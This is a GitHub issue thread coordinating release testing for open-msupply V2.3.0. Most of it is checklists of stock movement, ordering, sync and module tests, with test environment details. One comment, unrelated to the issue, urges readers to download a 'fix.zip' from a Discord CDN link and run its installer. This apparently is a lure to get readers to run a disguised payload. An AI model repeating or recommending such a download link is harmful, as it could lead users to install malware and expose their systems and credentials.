### ISSUE TITLE
🌱 V2.3.0 Release Testing

### ISSUE THREAD

**Issue by AnushaUp** [msupply-foundation/open-msupply#4731]
# V2.3.0 Release Testing

> [!NOTE]
> **Test Scripts** are available [here](https://github.com/msupply-foundation/open-msupply/wiki/Test-scripts), they are updated as the new features are coming out ✍🏼

> [!NOTE]
> Please follow [this document](https://docs.google.com/document/d/1aLQ7QwohBhr53U4jmXnYG0FrBqFDQPxPkO45-YFiLvQ/edit) for the most up-to-date QA practices :)

## V2.2.0 NEW FEATURES/IMPROVEMENTS
- [x] #4895 @marthakeezy + @Chris-Petty 
- [x] #4642 @regotaina (testing suite is a comment in the Epic) + @fergie-nz 
- [x] #4899 @AnushaUp + @lache-melvin + @marthakeezy 

## WORKFLOWS
These can be either one-store or multiple-store setup; depending on the workflow. 
Priority is to make sure the stock movement is functioning 

### STOCK MOVEMENT WORKFLOWS
- [x] #4937
- [x] #4943
- [x] #4944
- [x] #4949
- [x] #4957
- [x] #4929

### NORMAL ORDERING WORKFLOWS
- [x] #4959
- [x] #5015
- [x] #5051
- [x] #5083

### SYNCHRONISATION: CENTRAL DATA SYNC & SYNC INTEGRATION
- [x] #5084
    - [x] #5085
    - [x] #5087
- [x] #5086
    - [x] Sync Integration with Legacy mSupply Desktop
    - [x] Sync Integration with Legacy mSupply Mobile

## GENERAL MODULES
These can be tested in a single-store environment since they're more focused on UI 
Priority is to check/test if no buttons/modules are broken

### DISTRIBUTION
- [x] #5094
- [x] #5131
- [x] #5132
- [x] #5133

### REPLENISHMENT
- [x] #5101
- [x] #5105
- [x] #5114
- [x] #5115
- [x] #5117

### CATALOGUE
- [ ] Assets
- [ ] Items
- [ ] Master Lists

### INVENTORY
- [ ] Locations
- [ ] View Stocks
- [ ] Stocktakes

### DISPENSARY
- [x] #4932
- [x] #4930
- [x] #4965

### SETTINGS
- [ ] Display settings
- [ ] Sync
- [ ] Support
- [ ] Devices

### SYNCHRONISATION
  - [ ] Installation
  - [ ] Initialisation
  - [ ] Synchronisation
  - [ ] Reinitialisations
  - [ ] Version Updates

### COLD CHAIN - skipping this release
🚫 Monitoring
🚫 Sensors
🚫 Equipment

### MANAGE IMMUNIZATIONS 
- [ ] Configuration
- [ ] Facilities
- [ ] Demographics

### IMMUNIZATIONS PROGRAMS
- [ ] Immunizations Programs

### PATIENT PROGRAMS 
- [ ] Patient Registration
- [ ] Patient List
- [ ] Patient Details View
- [ ] Patient Program Enrolment
- [ ] Patient Program Encounters
- [ ] Viral Load logic
- [ ] Lost to Follow up (LTFU)

### PROGRAM REQUISITIONS
- [ ] Setups
- [ ] Creating a Program Internal Order
- [ ] Program IO window
- [ ] Requisitions 

### REMOTE AUTHORISATION
- [ ] Creating Internal Order
- [ ] Approving Internal Order
- [ ] Supplier Requisition

### **TEST ENVIRONMENT**
oms Version: `v2.3.00-RC3` 
mSupply Cloud-Server: v7.17.10
oms app-mode: choose:- `oms-server`+`browser(chrome, firefox, etc)`,`oms-desktop`;`apk`; `oms-standalone`
oms db: choose:- `SQLite3` OR `Postgres`

**Comment by zawa999** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by jmbrunskill** [comment]
Doing dev testing here: https://github.com/msupply-foundation/open-msupply/issues/4989

**Comment by marthakeezy** [comment]
Closing as no more release testing will be done for V2.3
